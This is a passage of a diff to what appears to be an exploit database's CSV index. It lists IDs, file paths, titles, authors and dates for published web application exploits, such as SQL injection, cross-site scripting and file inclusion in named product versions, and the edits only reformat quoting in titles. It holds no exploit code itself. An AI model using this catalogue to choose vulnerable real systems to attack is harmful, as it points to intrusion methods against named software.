-25926,platforms/php/webapps/25926.txt,"osTicket 1.2/1.3 - 'view.php' 'inc' Parameter Arbitrary Local File Inclusion",2005-06-30,"edisan & foster",php,webapps,0 +25926,platforms/php/webapps/25926.txt,"osTicket 1.2/1.3 - 'view.php inc' Parameter Arbitrary Local File Inclusion",2005-06-30,"edisan & foster",php,webapps,0 25924,platforms/asp/webapps/25924.txt,"fsboard 2.0 - Directory Traversal",2005-06-30,ActualMInd,asp,webapps,0 25925,platforms/asp/webapps/25925.txt,"CyberStrong EShop 4.2 - 10browse.asp SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 25928,platforms/php/webapps/25928.txt,"EasyPHPCalendar 6.1.5/6.2.x - calendar.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 @@ -28655,8 +28657,8 @@ id,file,description,date,author,platform,type,port 25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0 25969,platforms/hardware/webapps/25969.txt,"NETGEAR WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0 25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php' Local/Remote File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 -25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - 'tinybrowser.php' 'folder' Parameter Directory Traversal",2013-06-05,expl0i13r,php,webapps,0 -25976,platforms/hardware/webapps/25976.txt,"DS3 - Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps,0 +25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - 'tinybrowser.php folder' Parameter Directory Traversal",2013-06-05,expl0i13r,php,webapps,0 +25976,platforms/hardware/webapps/25976.txt,"DS3 Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps,0 25977,platforms/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",jsp,webapps,0 25978,platforms/hardware/webapps/25978.txt,"NETGEAR DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",hardware,webapps,80 25981,platforms/asp/webapps/25981.txt,"Hosting Controller 6.1 - Multiple SQL Injections",2005-07-13,"Soroush Dalili",asp,webapps,0 @@ -28710,7 +28712,7 @@ id,file,description,date,author,platform,type,port 26048,platforms/php/webapps/26048.txt,"Easypx41 - Multiple Variable Injection Vulnerabilities",2005-07-29,FalconDeOro,php,webapps,0 26049,platforms/php/webapps/26049.txt,"VBZoom 1.0/1.11 - profile.php 'Username' Parameter Cross-Site Scripting",2005-07-29,almaster,php,webapps,0 26050,platforms/php/webapps/26050.txt,"VBZoom 1.0/1.11 - 'login.php' UserID Parameter Cross-Site Scripting",2005-07-29,almaster,php,webapps,0 -26051,platforms/php/webapps/26051.txt,"Kayako LiveResponse 2.0 - 'index.php' 'Username' Parameter Cross-Site Scripting",2005-07-30,"James Bercegay",php,webapps,0 +26051,platforms/php/webapps/26051.txt,"Kayako LiveResponse 2.0 - 'index.php Username' Parameter Cross-Site Scripting",2005-07-30,"James Bercegay",php,webapps,0 26052,platforms/php/webapps/26052.txt,"Kayako LiveResponse 2.0 - 'index.php' Calendar Feature Multiple Parameter SQL Injection",2005-07-30,"James Bercegay",php,webapps,0 26053,platforms/php/webapps/26053.txt,"PluggedOut CMS 0.4.8 - 'contenttypeid' Parameter SQL Injection",2005-09-30,FalconDeOro,php,webapps,0 26054,platforms/php/webapps/26054.txt,"PluggedOut CMS 0.4.8 - admin.php Cross-Site Scripting",2005-09-30,FalconDeOro,php,webapps,0 @@ -28732,7 +28734,7 @@ id,file,description,date,author,platform,type,port 26070,platforms/asp/webapps/26070.txt,"Naxtor E-directory 1.0 - default.asp SQL Injection",2005-08-03,basher13,asp,webapps,0 26072,platforms/php/webapps/26072.txt,"PortailPHP 2.4 - 'index.php' SQL Injection",2005-08-04,abducter_minds@yahoo.com,php,webapps,0 26073,platforms/jsp/webapps/26073.txt,"Resin Application Server 4.0.36 - Source Code Disclosure",2013-06-10,LiquidWorm,jsp,webapps,0 -26327,platforms/php/webapps/26327.txt,"Utopia News Pro 1.1.3 - 'header.php' 'sitetitle' Parameter Cross-Site Scripting",2005-10-07,rgod,php,webapps,0 +26327,platforms/php/webapps/26327.txt,"Utopia News Pro 1.1.3 - 'header.php sitetitle' Parameter Cross-Site Scripting",2005-10-07,rgod,php,webapps,0 26077,platforms/php/webapps/26077.txt,"Concrete5 CMS 5.6.1.2 - Multiple Vulnerabilities",2013-06-10,expl0i13r,php,webapps,0 26297,platforms/php/webapps/26297.txt,"PHPMyFAQ 1.5.1 - Logs Unauthorized Access",2005-08-23,rgod,php,webapps,0 26298,platforms/php/webapps/26298.txt,"CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting",2005-09-26,X1ngBox,php,webapps,0 @@ -28783,7 +28785,7 @@ id,file,description,date,author,platform,type,port 26127,platforms/php/webapps/26127.txt,"TriggerTG TClanPortal 3.0 - Multiple SQL Injections",2005-08-09,admin@batznet.com,php,webapps,0 26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - Cross-Site Request Forgery",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0 26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection",2013-06-11,"CWH Underground",php,webapps,0 -26136,platforms/php/webapps/26136.txt,"Simple PHP Agenda 2.2.8 - 'edit_event.php' 'eventid' Parameter SQL Injection",2013-06-11,"Anthony Dubuissez",php,webapps,0 +26136,platforms/php/webapps/26136.txt,"Simple PHP Agenda 2.2.8 - 'edit_event.php eventid' Parameter SQL Injection",2013-06-11,"Anthony Dubuissez",php,webapps,0 26140,platforms/php/webapps/26140.txt,"ezUpload 2.2 - 'index.php' path Parameter Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 26141,platforms/php/webapps/26141.txt,"ezUpload 2.2 - initialize.php path Parameter Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 26142,platforms/php/webapps/26142.txt,"ezUpload 2.2 - customize.php path Parameter Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 @@ -28883,20 +28885,20 @@ id,file,description,date,author,platform,type,port 26266,platforms/php/webapps/26266.txt,"DeluxeBB 1.0 - 'forums.php' SQL Injection",2005-09-15,abducter,php,webapps,0 26267,platforms/php/webapps/26267.txt,"DeluxeBB 1.0 - 'pm.php' SQL Injection",2005-09-15,abducter,php,webapps,0 26268,platforms/php/webapps/26268.txt,"DeluxeBB 1.0 - 'newpost.php' SQL Injection",2005-09-15,abducter,php,webapps,0 -26333,platforms/asp/webapps/26333.html,"Aenovo - '/Password/default.asp' Password Field SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 -26334,platforms/asp/webapps/26334.txt,"Aenovo - '/incs/searchdisplay.asp' strSQL Parameter SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 +26333,platforms/asp/webapps/26333.html,"Aenovo - '/Password/default.asp Password' SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 +26334,platforms/asp/webapps/26334.txt,"Aenovo - '/incs/searchdisplay.asp strSQL' Parameter SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 26270,platforms/php/webapps/26270.txt,"Content2Web 1.0.1 - Multiple Input Validation Vulnerabilities",2005-09-16,"Security Tester",php,webapps,0 26272,platforms/php/webapps/26272.txt,"EPay Pro 2.0 - 'index.php' Directory Traversal",2005-09-19,h4cky0u,php,webapps,0 26273,platforms/php/webapps/26273.txt,"vBulletin 1.0.1 lite/2.x/3.0 - joinrequests.php request Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 26274,platforms/php/webapps/26274.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php' Multiple Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 -26275,platforms/php/webapps/26275.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertitle.php' 'usertitleid' Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 -26276,platforms/php/webapps/26276.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertools.php' 'ids' Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 +26275,platforms/php/webapps/26275.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertitle.php usertitleid' Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 +26276,platforms/php/webapps/26276.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertools.php ids' Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 26277,platforms/php/webapps/26277.txt,"NooToplist 1.0 - 'index.php' Multiple SQL Injections",2005-09-19,"David Sopas Ferreira",php,webapps,0 -26278,platforms/php/webapps/26278.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/css.php' 'group' Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26278,platforms/php/webapps/26278.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/css.php group' Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 26279,platforms/php/webapps/26279.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/index.php' Multiple Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 -26280,platforms/php/webapps/26280.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php' 'email' Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 -26281,platforms/php/webapps/26281.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/language.php' 'goto' Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 -26282,platforms/php/webapps/26282.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/modlog.php' 'orderby' Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26280,platforms/php/webapps/26280.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php email' Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26281,platforms/php/webapps/26281.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/language.php goto' Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26282,platforms/php/webapps/26282.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/modlog.php orderby' Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 26283,platforms/php/webapps/26283.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/template.php' Multiple Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 26284,platforms/php/webapps/26284.txt,"MX Shop 3.2 - 'index.php' Multiple SQL Injections",2005-09-19,"David Sopas Ferreira",php,webapps,0 26285,platforms/php/webapps/26285.txt,"Hesk 0.92/0.93 - Session ID Authentication Bypass",2005-09-20,"Rajesh Sethumadhavan",php,webapps,0 @@ -28921,9 +28923,9 @@ id,file,description,date,author,platform,type,port 26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 - 'footer.php' Multiple Parameter Cross-Site Scripting",2005-10-07,rgod,php,webapps,0 26324,platforms/php/webapps/26324.txt,"TellMe 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-05,"Donnie Werner",php,webapps,0 26335,platforms/asp/webapps/26335.txt,"Aenovo - Multiple Unspecified Cross-Site Scripting Vulnerabilities",2005-10-07,"farhad koosha",asp,webapps,0 -26337,platforms/php/webapps/26337.php,"Cyphor 0.19 - lostpwd.php nick Field SQL Injection",2005-10-08,rgod,php,webapps,0 -26338,platforms/php/webapps/26338.txt,"Cyphor 0.19 - 'newmsg.php' fid Parameter SQL Injection",2005-10-08,retrogod@aliceposta.it,php,webapps,0 -26339,platforms/php/webapps/26339.txt,"Cyphor 0.19 - footer.php t_login Parameter Cross-Site Scripting",2005-10-08,retrogod@aliceposta.it,php,webapps,0 +26337,platforms/php/webapps/26337.php,"Cyphor 0.19 - 'lostpwd.php nick' SQL Injection",2005-10-08,rgod,php,webapps,0 +26338,platforms/php/webapps/26338.txt,"Cyphor 0.19 - 'newmsg.php fid' Parameter SQL Injection",2005-10-08,retrogod@aliceposta.it,php,webapps,0 +26339,platforms/php/webapps/26339.txt,"Cyphor 0.19 - 'footer.php t_login' Parameter Cross-Site Scripting",2005-10-08,retrogod@aliceposta.it,php,webapps,0 26343,platforms/php/webapps/26343.txt,"Accelerated E Solutions - SQL Injection",2005-10-11,"Andysheh Soltani",php,webapps,0 26344,platforms/cgi/webapps/26344.txt,"WebGUI 6.x - Arbitrary Command Execution",2005-10-12,"David Maciejak",cgi,webapps,0 26345,platforms/php/webapps/26345.txt,"YaPiG 0.95b - view.php img_size Parameter Cross-Site Scripting",2005-10-13,enji@infosys.tuwien.ac.at,php,webapps,0 @@ -28943,14 +28945,14 @@ id,file,description,date,author,platform,type,port 26361,platforms/php/webapps/26361.txt,"MySource 2.14 - edit_table_cell_type_wysiwyg.php Stylesheet Parameter Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 26362,platforms/php/webapps/26362.txt,"MySource 2.14 - new_upgrade_functions.php Multiple Parameter Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26363,platforms/php/webapps/26363.txt,"MySource 2.14 - init_mysource.php INCLUDE_PATH Parameter Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26364,platforms/php/webapps/26364.txt,"MySource 2.14 - 'Socket.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26365,platforms/php/webapps/26365.txt,"MySource 2.14 - 'Request.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26364,platforms/php/webapps/26364.txt,"MySource 2.14 - 'Socket.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26365,platforms/php/webapps/26365.txt,"MySource 2.14 - 'Request.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26366,platforms/php/webapps/26366.txt,"GLPI 0.83.8 - Multiple Vulnerabilities",2013-06-21,LiquidWorm,php,webapps,0 -26369,platforms/php/webapps/26369.txt,"MySource 2.14 - 'mail.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26370,platforms/php/webapps/26370.txt,"MySource 2.14 - 'Date.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26371,platforms/php/webapps/26371.txt,"MySource 2.14 - 'Span.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26372,platforms/php/webapps/26372.txt,"MySource 2.14 - 'mimeDecode.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26373,platforms/php/webapps/26373.txt,"MySource 2.14 - 'mime.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26369,platforms/php/webapps/26369.txt,"MySource 2.14 - 'mail.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26370,platforms/php/webapps/26370.txt,"MySource 2.14 - 'Date.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26371,platforms/php/webapps/26371.txt,"MySource 2.14 - 'Span.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26372,platforms/php/webapps/26372.txt,"MySource 2.14 - 'mimeDecode.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26373,platforms/php/webapps/26373.txt,"MySource 2.14 - 'mime.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26377,platforms/php/webapps/26377.txt,"PHP-Nuke Search Module - modules.php Directory Traversal",2005-10-19,sp3x@securityreason.com,php,webapps,0 26378,platforms/php/webapps/26378.txt,"Chipmunk Forum - 'newtopic.php' forumID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 26379,platforms/php/webapps/26379.txt,"Chipmunk Forum - quote.php forumID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 @@ -28973,7 +28975,7 @@ id,file,description,date,author,platform,type,port 26399,platforms/php/webapps/26399.txt,"Belchior Foundry VCard 2.9 - Remote File Inclusion",2005-10-26,X,php,webapps,0 26400,platforms/php/webapps/26400.txt,"Flyspray 0.9 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-26,Lostmon,php,webapps,0 26401,platforms/hardware/webapps/26401.txt,"TRENDnet TE100-P1U Print Server Firmware 4.11 - Authentication Bypass",2013-06-24,Chako,hardware,webapps,0 -26405,platforms/php/webapps/26405.txt,"Top Games Script 1.2 - 'play.php' 'gid' Parameter SQL Injection",2013-06-24,AtT4CKxT3rR0r1ST,php,webapps,0 +26405,platforms/php/webapps/26405.txt,"Top Games Script 1.2 - 'play.php gid' Parameter SQL Injection",2013-06-24,AtT4CKxT3rR0r1ST,php,webapps,0 26406,platforms/php/webapps/26406.txt,"Alienvault Open Source SIEM (OSSIM) 4.1 - Multiple SQL Injection Vulnerabilities",2013-06-24,"Glafkos Charalambous",php,webapps,0 27541,platforms/php/webapps/27541.txt,"DbbS 2.0 - Topics.php SQL Injection",2006-03-31,DaBDouB-MoSiKaR,php,webapps,0 27542,platforms/php/webapps/27542.txt,"SoftBiz Image Gallery - mage_desc.php Multiple Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 @@ -28982,7 +28984,7 @@ id,file,description,date,author,platform,type,port 26410,platforms/php/webapps/26410.py,"Collabtive 1.0 - 'manageuser.php' SQL Injection",2013-06-24,drone,php,webapps,0 26414,platforms/php/webapps/26414.txt,"PodHawk 1.85 - Arbitrary File Upload",2013-06-24,"CWH Underground",php,webapps,0 26415,platforms/hardware/webapps/26415.txt,"Linksys X3000 1.0.03 build 001 - Multiple Vulnerabilities",2013-06-24,m-1-k-3,hardware,webapps,0 -26416,platforms/php/webapps/26416.txt,"Elemata CMS RC3.0 - 'global.php' 'id' Parameter SQL Injection",2013-06-24,"CWH Underground",php,webapps,0 +26416,platforms/php/webapps/26416.txt,"Elemata CMS RC3.0 - 'global.php id' Parameter SQL Injection",2013-06-24,"CWH Underground",php,webapps,0 26827,platforms/php/webapps/26827.txt,"QuickPayPro 3.1 - popups.edit.php popupid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26423,platforms/php/webapps/26423.txt,"Mantis 0.19.2/1.0 - 'Bug_sponsorship_list_view_inc.php' File Inclusion",2005-10-26,"Andreas Sandblad",php,webapps,0 26425,platforms/php/webapps/26425.pl,"Woltlab 1.1/2.x - 'Info-DB Info_db.php' Multiple SQL Injections",2005-10-26,admin@batznet.com,php,webapps,0 @@ -29008,7 +29010,7 @@ id,file,description,date,author,platform,type,port 26446,platforms/php/webapps/26446.txt,"Belchior Foundry vCard Pro 3.1 - Addrbook.php SQL Injection",2005-11-01,almaster,php,webapps,0 26447,platforms/php/webapps/26447.html,"Elite Forum 1.0 - HTML Injection",2005-11-01,gladiator,php,webapps,0 26449,platforms/php/webapps/26449.txt,"e107 Advanced Medal System Plugin - SQL Injection",2013-06-26,"Life Wasted",php,webapps,0 -26453,platforms/php/webapps/26453.py,"PHP-Charts 1.0 - 'index.php' 'type' Parameter Remote Code Execution",2013-06-26,infodox,php,webapps,0 +26453,platforms/php/webapps/26453.py,"PHP-Charts 1.0 - 'index.php type' Parameter Remote Code Execution",2013-06-26,infodox,php,webapps,0 26455,platforms/php/webapps/26455.txt,"VUBB - 'index.php' Cross-Site Scripting",2005-11-01,"Alireza Hassani",php,webapps,0 26456,platforms/php/webapps/26456.txt,"XMB Forum 1.9.3 - post.php SQL Injection",2005-11-01,almaster,php,webapps,0 26458,platforms/php/webapps/26458.txt,"News2Net 3.0 - 'index.php' SQL Injection",2005-11-02,Mousehack,php,webapps,0 @@ -29029,11 +29031,11 @@ id,file,description,date,author,platform,type,port 26477,platforms/php/webapps/26477.txt,"XMB Forum 1.9.3 - u2u.php Cross-Site Scripting",2005-11-07,"HACKERS PAL",php,webapps,0 26478,platforms/php/webapps/26478.txt,"Invision Power Services Invision Board 2.1 - admin.php Multiple Parameter Cross-Site Scripting",2005-11-07,benjilenoob,php,webapps,0 26480,platforms/php/webapps/26480.txt,"ToendaCMS 0.6.1 - admin.php Directory Traversal",2005-11-07,"Bernhard Mueller",php,webapps,0 -26481,platforms/php/webapps/26481.txt,"PHPList Mailing List Manager 2.x - '/admin/admin.php' 'id' Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 -26482,platforms/php/webapps/26482.txt,"PHPList Mailing List Manager 2.x - '/admin/editattributes.php' 'id' Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 +26481,platforms/php/webapps/26481.txt,"PHPList Mailing List Manager 2.x - '/admin/admin.php id' Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 +26482,platforms/php/webapps/26482.txt,"PHPList Mailing List Manager 2.x - '/admin/editattributes.php id' Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 26483,platforms/php/webapps/26483.txt,"PHPList Mailing List Manager 2.x - '/admin/eventlog.php' Multiple Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 -26484,platforms/php/webapps/26484.txt,"PHPList Mailing List Manager 2.x - '/admin/configure.php' 'id' Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 -26485,platforms/php/webapps/26485.txt,"PHPList Mailing List Manager 2.x - '/admin/users.php' 'find' Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 +26484,platforms/php/webapps/26484.txt,"PHPList Mailing List Manager 2.x - '/admin/configure.php id' Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 +26485,platforms/php/webapps/26485.txt,"PHPList Mailing List Manager 2.x - '/admin/users.php find' Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 26486,platforms/php/webapps/26486.txt,"SAP Web Application Server 6.x/7.0 - Error Page Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps,0 26487,platforms/php/webapps/26487.txt,"SAP Web Application Server 6.x/7.0 - frameset.htm sap-syscmd Parameter Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps,0 26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 - URI redirection",2005-11-09,"Leandro Meiners",php,webapps,0 @@ -29046,9 +29048,9 @@ id,file,description,date,author,platform,type,port 26503,platforms/php/webapps/26503.txt,"Wizz Forum - ForumAuthDetails.php AuthID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 26504,platforms/php/webapps/26504.txt,"Wizz Forum - forumreply.php TopicID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 26505,platforms/php/webapps/26505.txt,"Codegrrl - Protection.php Unspecified Code Execution",2005-11-14,"Robin Verton",php,webapps,0 -26506,platforms/cgi/webapps/26506.txt,"Walla TeleSite 3.0 - 'ts.exe' 'tsurl' Parameter Arbitrary Article Access",2005-11-15,"Rafi Nahum",cgi,webapps,0 -26507,platforms/cgi/webapps/26507.txt,"Walla TeleSite 3.0 - 'ts.exe' 'sug' Parameter Cross-Site Scripting",2005-11-15,"Rafi Nahum",cgi,webapps,0 -26508,platforms/cgi/webapps/26508.txt,"Walla TeleSite 3.0 - 'ts.exe' 'sug' Parameter SQL Injection",2005-11-15,"Rafi Nahum",cgi,webapps,0 +26506,platforms/cgi/webapps/26506.txt,"Walla TeleSite 3.0 - 'ts.exe tsurl' Parameter Arbitrary Article Access",2005-11-15,"Rafi Nahum",cgi,webapps,0 +26507,platforms/cgi/webapps/26507.txt,"Walla TeleSite 3.0 - 'ts.exe sug' Parameter Cross-Site Scripting",2005-11-15,"Rafi Nahum",cgi,webapps,0 +26508,platforms/cgi/webapps/26508.txt,"Walla TeleSite 3.0 - 'ts.exe sug' Parameter SQL Injection",2005-11-15,"Rafi Nahum",cgi,webapps,0 26509,platforms/cgi/webapps/26509.txt,"Walla TeleSite 3.0 - ts.cgi File Existence Enumeration",2005-11-15,"Rafi Nahum",cgi,webapps,0 26510,platforms/php/webapps/26510.txt,"Pearl Forums 2.0 - 'index.php' Multiple SQL Injections",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 26511,platforms/php/webapps/26511.txt,"Pearl Forums 2.0 - 'index.php' Local File Inclusion",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 @@ -29063,7 +29065,7 @@ id,file,description,date,author,platform,type,port 27437,platforms/php/webapps/27437.txt,"Invision Power Services Invision Board 2.0.4 - 'index.php' st Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 26527,platforms/hardware/webapps/26527.txt,"Barracuda SSL VPN 680Vx 2.3.3.193 - Multiple Script Injection Vulnerabilities",2013-07-01,LiquidWorm,hardware,webapps,0 26528,platforms/hardware/webapps/26528.txt,"Fortigate Firewalls - Cross-Site Request Forgery",2013-07-01,"Sven Wurth",hardware,webapps,0 -26530,platforms/php/webapps/26530.txt,"GLPI 0.83.9 - 'Unserialize()' Function Remote Code Execution",2013-07-01,"Xavier Mehrenberger",php,webapps,0 +26530,platforms/php/webapps/26530.txt,"GLPI 0.83.9 - 'Unserialize()' Remote Code Execution",2013-07-01,"Xavier Mehrenberger",php,webapps,0 26532,platforms/jsp/webapps/26532.txt,"Revize CMS - Query_results.jsp SQL Injection",2005-11-17,Lostmon,jsp,webapps,0 26533,platforms/jsp/webapps/26533.txt,"Revize CMS - Revize.XML Information Disclosure",2005-11-17,Lostmon,jsp,webapps,0 26534,platforms/jsp/webapps/26534.txt,"Revize CMS HTTPTranslatorServlet - Cross-Site Scripting",2005-11-17,Lostmon,jsp,webapps,0 @@ -29338,7 +29340,7 @@ id,file,description,date,author,platform,type,port 26857,platforms/php/webapps/26857.txt,"PHP Arena PAFileDB Extreme Edition - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 26858,platforms/cgi/webapps/26858.txt,"Binary Board System 0.2.5 - 'reply.pl' Multiple Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 26859,platforms/cgi/webapps/26859.txt,"Binary Board System 0.2.5 - 'stats.pl' Multiple Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 -26860,platforms/cgi/webapps/26860.txt,"Binary Board System 0.2.5 - 'toc.pl' 'board' Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 +26860,platforms/cgi/webapps/26860.txt,"Binary Board System 0.2.5 - 'toc.pl board' Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 26861,platforms/cgi/webapps/26861.txt,"ScareCrow 2.13 - forum.cgi forum Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 26862,platforms/cgi/webapps/26862.txt,"ScareCrow 2.13 - profile.cgi user Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 26863,platforms/cgi/webapps/26863.txt,"ScareCrow 2.13 - post.cgi forum Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 @@ -29436,7 +29438,7 @@ id,file,description,date,author,platform,type,port 26968,platforms/php/webapps/26968.txt,"SyntaxCMS - Search Query Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0 26969,platforms/asp/webapps/26969.txt,"Tangora Portal CMS 4.0 - Action Parameter Cross-Site Scripting",2005-12-22,r0t3d3Vil,asp,webapps,0 26972,platforms/jsp/webapps/26972.txt,"oracle Application server discussion forum portlet - Multiple Vulnerabilities",2005-12-23,"Johannes Greil",jsp,webapps,0 -26973,platforms/php/webapps/26973.txt,"Cerberus Helpdesk 2.649 - 'cer_KnowledgebaseHandler.class.php' '_load_article_details' Function SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 +26973,platforms/php/webapps/26973.txt,"Cerberus Helpdesk 2.649 - 'cer_KnowledgebaseHandler.class.php _load_article_details' SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 26974,platforms/php/webapps/26974.txt,"Cerberus Helpdesk 2.649 - addresses_export.php queues Parameter SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 26975,platforms/php/webapps/26975.txt,"Cerberus Helpdesk 2.649 - display_ticket_thread.php ticket Parameter SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 26976,platforms/php/webapps/26976.txt,"Dev Web Management System 1.5 - getfile.php cat Parameter SQL Injection",2005-12-27,retrogod@aliceposta.it,php,webapps,0 @@ -29444,9 +29446,9 @@ id,file,description,date,author,platform,type,port 26978,platforms/php/webapps/26978.txt,"Dev Web Management System 1.5 - add.php Multiple Parameter Cross-Site Scripting",2005-12-27,retrogod@aliceposta.it,php,webapps,0 26979,platforms/php/webapps/26979.txt,"IceWarp Universal WebMail - '/accounts/inc/include.php' Multiple Parameter Remote File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 26980,platforms/php/webapps/26980.txt,"IceWarp Universal WebMail - '/admin/inc/include.php' Multiple Parameter Remote File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 -26981,platforms/php/webapps/26981.txt,"IceWarp Universal WebMail - '/dir/include.html' 'lang' Parameter Local File Inclusion",2005-12-27,"Tan Chew 